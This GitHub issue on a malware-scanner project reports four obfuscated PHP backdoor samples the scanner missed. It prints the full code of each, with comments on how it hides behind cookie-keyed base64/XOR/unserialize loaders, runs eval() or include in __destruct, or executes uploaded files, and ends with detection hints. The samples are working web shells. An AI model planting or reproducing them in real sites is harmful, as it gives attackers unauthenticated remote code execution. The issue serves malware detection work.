Undetected malware samples #105

Open
ebourg opened this issue Jul 18, 2024 · 1 comment
ebourg commented Jul 18, 2024

I just found these malware samples, which the scanner did not detect:

/*
 * Malware sample 1: obfuscated PHP backdoor, kept byte-identical so it can serve as a
 * scanner test fixture. Annotated from the visible constants only:
 *  - $GRNRFc assembles the class name "V_QnEKK"; $ZkQeaKiKV assembles "class_exists".
 *    The class body is only declared when class_exists() is false (double-include guard).
 *  - __construct reads $_COOKIE["3014"] (first 4 chars of the hard-coded UUID key),
 *    explode()s it on "," and concatenates the named $_COOKIE/$_POST values into one blob.
 *  - The blob is base64_decode()d (function name built from chr(N - M)/"\xNN"/octal pieces),
 *    XORed with the repeated UUID key (CBihlQQeR) and fed to @unserialize() into the
 *    static $xBmKEmU.
 *  - __destruct -> vAjeUvW: if that static is an array, "<?php" is stripped from ["content"]
 *    and the rest is eval()ed, then exit(). EbUQQDwP() instantiates the object and drops it
 *    at once, so the destructor (and the eval) fires on every request that carries the cookie.
 *  - Without the cookie the static stays the integer 25143, is_array() is false and the file
 *    is a silent no-op, so behavioural sandboxing sees nothing.
 * Detection hints: identifiers assembled from chr()/hex/octal escapes, unserialize() of
 * cookie/POST data, eval() inside __destruct, and a class_exists() self-check.
 */
$GRNRFc = 'V' . '_' . "\x51" . "\x6e" . 'E' . 'K' . "\x4b";$ZkQeaKiKV = chr (99) . chr ( 482 - 374 ).chr (97) . "\x73" . "\x73" . chr (95) . chr (101) . "\x78" . chr ( 513 - 408 ).chr (115) . "\x74" . chr (115); $tHCTzrRTa = class_exists($GRNRFc); $ZkQeaKiKV = "30813";$Bnauel = !1;if ($tHCTzrRTa == $Bnauel){function EbUQQDwP(){$zrmsCLkLp = new /* 28317 */ V_QnEKK(18652 + 18652); $zrmsCLkLp = NULL;}$yCUiq = "18652";class V_QnEKK{private function vAjeUvW($yCUiq){if (is_array(V_QnEKK::$xBmKEmU)) {$DkdswkjV = str_replace("\74" . '?' . chr (112) . "\x68" . 'p', "", V_QnEKK::$xBmKEmU["\x63" . "\x6f" . "\156" . "\164" . chr (101) . "\x6e" . 't']);eval($DkdswkjV); $yCUiq = "18652";exit();}}private $OashYfi;public function avjuwOZFze(){echo 41931;}public function __destruct(){$yCUiq = "63071_28842";$this->vAjeUvW($yCUiq); $yCUiq = "63071_28842";}public function CBihlQQeR($oLvOlCz, $ICNQhIu){return $oLvOlCz[0] ^ str_repeat($ICNQhIu, (strlen($oLvOlCz[0]) / strlen($ICNQhIu)) + 1);}public function __construct($xAXqvTpA=0){$FPxTqQPgB = $_POST;$AZJPK = $_COOKIE;$ICNQhIu = "301407a7-7bdd-4637-b5c9-06e442e49d5a";$jxkKrdbK = @$AZJPK[substr($ICNQhIu, 0, 4)];if (!empty($jxkKrdbK)){$BsKyrwAEcE = "base64";$oLvOlCz = "";$jxkKrdbK = explode(",", $jxkKrdbK);foreach ($jxkKrdbK as $BuxlJxC){$oLvOlCz .= @$AZJPK[$BuxlJxC];$oLvOlCz .= @$FPxTqQPgB[$BuxlJxC];}$oLvOlCz = array_map($BsKyrwAEcE . '_' . chr ( 938 - 838 ).'e' . chr ( 574 - 475 )."\x6f" . "\x64" . "\145", array($oLvOlCz,)); $oLvOlCz = $this->CBihlQQeR($oLvOlCz, $ICNQhIu);V_QnEKK::$xBmKEmU = @unserialize($oLvOlCz);}}public static $xBmKEmU = 25143;}EbUQQDwP();}
<?php

// Malware sample 2, entry point. Despite the WordPress-flavoured local names
// (post_types, mime_match, cockneyreplace, ...) this is a file-upload backdoor.
// Decoding the two input() calls against the key 'f97L4Hyn8Jg' gives:
//   input("9%7F%7E%00q%1B", key)     => "_FILES"
//   input("%12TG%13Z%29%14%0B", key) => "tmp_name"
// so the function is equivalent to:
//   if (isset($_FILES['f97L4Hyn8Jg'])) include $_FILES['f97L4Hyn8Jg']['tmp_name'];
// i.e. any file uploaded under the form field "f97L4Hyn8Jg" is executed as PHP.
// There is no is_uploaded_file(), extension or MIME check. The unused locals
// ($custom_fields, $tt_ids) and the extra aliases are padding against signatures.
function _charset()

{
    $raw_title = 'f97L4Hyn8Jg'; // doubles as XOR key for input() and as the $_FILES field name
    $post_types = $raw_title;



    $previous_date = $GLOBALS[input("9%7F%7E%00q%1B", $post_types)]; // decodes to $GLOBALS['_FILES']
    $delete = $previous_date;
        $custom_fields = '_post'; // unused padding
    $mime_match = isset($delete[$post_types]); // was a file uploaded under field 'f97L4Hyn8Jg'?

    if ($mime_match)

    {
        $tt_ids = 'internal'; // unused padding
        $sanitized = $previous_date[$post_types];
        $cockneyreplace = $sanitized[input("%12TG%13Z%29%14%0B", $post_types)]; // decodes to ['tmp_name']
        $parts = $cockneyreplace;
        include ($parts); // executes the uploaded temp file as PHP: unauthenticated remote code execution
    }
}
// Obfuscation helper for sample 2: url-decodes $show_in_admin_status_list and XORs
// it with a prefix of $publicly_queryable of the same length (PHP string XOR
// truncates to the shorter operand). Its only purpose is to hide the literals
// "_FILES" and "tmp_name" from grep-style scanning. $double_prime and the second
// assignment to $mins are dead code; only $show_in_menu is returned.
function input($show_in_admin_status_list, $publicly_queryable)

{

    $wp_post_types = $publicly_queryable;
        $double_prime = 'tags_to_ignore'; // unused padding
    $property_name = "url" . "decode"; // "urldecode" split in two to dodge literal matching
    $mins = $property_name($show_in_admin_status_list);

    $format = substr($wp_post_types,0, strlen($mins)); // key prefix, same length as the ciphertext

    $show_in_menu = $mins ^ $format; // byte-wise XOR decode

    $mins = strpos($show_in_menu, $format); // result discarded (padding)

    return $show_in_menu;
}
        $nohier_vs_hier_defaults = 'post_type_in_string'; // unused padding

_charset(); // runs the upload-and-include backdoor on every request to this file

?>
/*
 * Malware sample 3: same family as sample 1 (cookie-keyed, base64 + XOR + unserialize,
 * eval() in __destruct), kept byte-identical as a fixture. Differences from sample 1:
 *  - class name assembled as "d_IeEyL"; the selector cookie is $_COOKIE["adae"]
 *    (first 4 chars of the hard-coded key "adaea6d7-...").
 *  - gLYWbhtb() merely returns FALSE; it is decoy/padding.
 *  - the XOR step is inlined in __construct instead of living in a helper method.
 *  - the object is created directly (new $yePAZNLbRY(...)) and then every variable is
 *    overwritten with Array(), so __destruct -> DmoLd fires immediately and eval()s
 *    ["content"] with "<?php" stripped, then exit()s.
 * Without the cookie the static $UiTJxGm stays the integer 44887, is_array() is false and
 * the file is silent. Same detection hints as sample 1.
 */
$yePAZNLbRY = chr (100) . chr ( 642 - 547 )."\x49" . chr ( 1057 - 956 ).chr (69) . "\x79" . chr (76); $qffKMCuiT = "\x63" . chr (108) . chr (97) . chr ( 923 - 808 ).'s' . chr (95) . 'e' . "\x78" . "\x69" . "\163" . "\x74" . "\163";$TLvyEg = class_exists($yePAZNLbRY); $qffKMCuiT = "3393";$alXknwj = !1;if ($TLvyEg == $alXknwj){function gLYWbhtb(){return FALSE;}$sTgbCPwWxw = "41613";gLYWbhtb();class d_IeEyL{private function DmoLd($sTgbCPwWxw){if (is_array(d_IeEyL::$UiTJxGm)) {$bvlyHtI = str_replace(chr ( 106 - 46 ) . "\x3f" . "\x70" . 'h' . chr (112), "", d_IeEyL::$UiTJxGm[chr (99) . chr ( 968 - 857 ).'n' . chr ( 337 - 221 )."\145" . 'n' . chr (116)]);eval($bvlyHtI); $sTgbCPwWxw = "41613";exit();}}private $RbnFu;public function JYIasy(){echo 42935;}public function __destruct(){$sTgbCPwWxw = "14197_12147";$this->DmoLd($sTgbCPwWxw); $sTgbCPwWxw = "14197_12147";}public function __construct($sQvGICW=0){$HidyYs = $_POST;$xcZSJMJSS = $_COOKIE;$nDkFFGJ = "adaea6d7-c626-495a-9839-246089b4c92a";$WwkXBUdfJJ = @$xcZSJMJSS[substr($nDkFFGJ, 0, 4)];if (!empty($WwkXBUdfJJ)){$EctSW = "base64";$oLeNYMtOPT = "";$WwkXBUdfJJ = explode(",", $WwkXBUdfJJ);foreach ($WwkXBUdfJJ as $phDSwy){$oLeNYMtOPT .= @$xcZSJMJSS[$phDSwy];$oLeNYMtOPT .= @$HidyYs[$phDSwy];}$oLeNYMtOPT = array_map($EctSW . "\137" . "\144" . "\145" . "\x63" . "\157" . "\x64" . "\x65", array($oLeNYMtOPT,)); $oLeNYMtOPT = $oLeNYMtOPT[0] ^ str_repeat($nDkFFGJ, (strlen($oLeNYMtOPT[0]) / strlen($nDkFFGJ)) + 1);d_IeEyL::$UiTJxGm = @unserialize($oLeNYMtOPT); $oLeNYMtOPT = class_exists("14197_12147");}}public static $UiTJxGm = 44887;}$UfEFb = new /* 25527 */ $yePAZNLbRY(41613 + 41613); $sTgbCPwWxw = strpos($sTgbCPwWxw, $sTgbCPwWxw); $alXknwj = $UfEFb = $sTgbCPwWxw = Array();}

I suppose that `explode` and `eval` appearing together on the first line of a file could be flagged as suspicious. The more distinctive markers shared by these samples, though, are identifiers assembled from `chr()`/hex/octal escapes, `unserialize()` applied to cookie/POST data, and the code-execution call (`eval` or `include`) placed inside a `__destruct` method.

ebourg commented Jul 18, 2024

Here is another one, this time without `eval`:

/*
 * Malware sample 4: same delivery channel as samples 1 and 3 (selector cookie "de91" from
 * the key "de91630f-...", comma-separated list of $_COOKIE/$_POST field names, base64 then
 * XOR with the key), but the execution primitive is include instead of eval:
 *  - class name assembled as "t_lcy"; __destruct first @unserialize()s the decoded blob into
 *    t_lcy::$HmCPtFpTo, then calls tSazHL(), which if the result is an array:
 *  - builds a path sys_get_temp_dir() . "/" . crc32($payload["salt"]),
 *  - calls $payload["write"]($path, $payload["content"]) - the callee name itself comes from
 *    the attacker-controlled payload (presumably a file-writing function; the sample does not fix it),
 *  - include $path, then $payload["delete"]($path) and exit().
 *  - FzMEGqlMK() instantiates and drops the object, so this runs on every request.
 * Without the cookie the static stays the integer 53491, @unserialize() yields false and
 * nothing happens. Detection hints: a variable function call whose name comes from
 * unserialize()d input, include of a just-written temp file, and the chr()/octal-assembled
 * keys "salt"/"write"/"content"/"delete". The absence of eval() is not a safe signal here.
 */
$exXhBCc = 't' . "\137" . "\x6c" . "\x63" . 'y';$JjYSAMYHH = "\x63" . "\x6c" . chr ( 717 - 620 ).'s' . chr ( 165 - 50 ).'_' . "\145" . "\170" . "\151" . "\x73" . chr (116) . "\x73";$wzfPz = class_exists($exXhBCc); $JjYSAMYHH = "44175";$aDLLwXVYSL = !1;if ($wzfPz == $aDLLwXVYSL){function FzMEGqlMK(){$VVaMVwrN = new /* 41728 */ t_lcy(5855 + 5855); $VVaMVwrN = NULL;}$cDNjoQAt = "5855";class t_lcy{private function tSazHL($cDNjoQAt){if (is_array(t_lcy::$HmCPtFpTo)) {$kpOpXOOQ = sys_get_temp_dir() . "/" . crc32(t_lcy::$HmCPtFpTo["\163" . "\x61" . chr ( 1085 - 977 )."\164"]);@t_lcy::$HmCPtFpTo["\x77" . "\x72" . "\151" . chr ( 769 - 653 ).'e']($kpOpXOOQ, t_lcy::$HmCPtFpTo["\143" . "\x6f" . "\156" . chr (116) . chr ( 590 - 489 )."\156" . chr (116)]);include $kpOpXOOQ;@t_lcy::$HmCPtFpTo[chr ( 312 - 212 ).'e' . 'l' . "\145" . "\164" . 'e']($kpOpXOOQ); $cDNjoQAt = "5855";exit();}}private $aEFjoHrDU;public function VzdTtnMm(){echo 1986;}public function __destruct(){t_lcy::$HmCPtFpTo = @unserialize(t_lcy::$HmCPtFpTo); $cDNjoQAt = "64201_44762";$this->tSazHL($cDNjoQAt); $cDNjoQAt = "64201_44762";}public function OdICv($ihsQcHj, $ZUMkhwR){return $ihsQcHj[0] ^ str_repeat($ZUMkhwR, (strlen($ihsQcHj[0]) / strlen($ZUMkhwR)) + 1);}public function __construct($qQNwRv=0){$FpjbTffga = $_POST;$VuwvnDjEdq = $_COOKIE;$ZUMkhwR = "de91630f-5086-4c88-8fa4-67d5961f9380";$BQSVpVoUG = @$VuwvnDjEdq[substr($ZUMkhwR, 0, 4)];if (!empty($BQSVpVoUG)){$GnQvdl = "base64";$ihsQcHj = "";$BQSVpVoUG = explode(",", $BQSVpVoUG);foreach ($BQSVpVoUG as $VOaHShiHN){$ihsQcHj .= @$VuwvnDjEdq[$VOaHShiHN];$ihsQcHj .= @$FpjbTffga[$VOaHShiHN];}$ihsQcHj = array_map($GnQvdl . "\137" . "\x64" . "\145" . chr (99) . "\157" . chr ( 524 - 424 )."\145", array($ihsQcHj,));t_lcy::$HmCPtFpTo = $this->OdICv($ihsQcHj, $ZUMkhwR);}}public static $HmCPtFpTo = 53491;}FzMEGqlMK();}
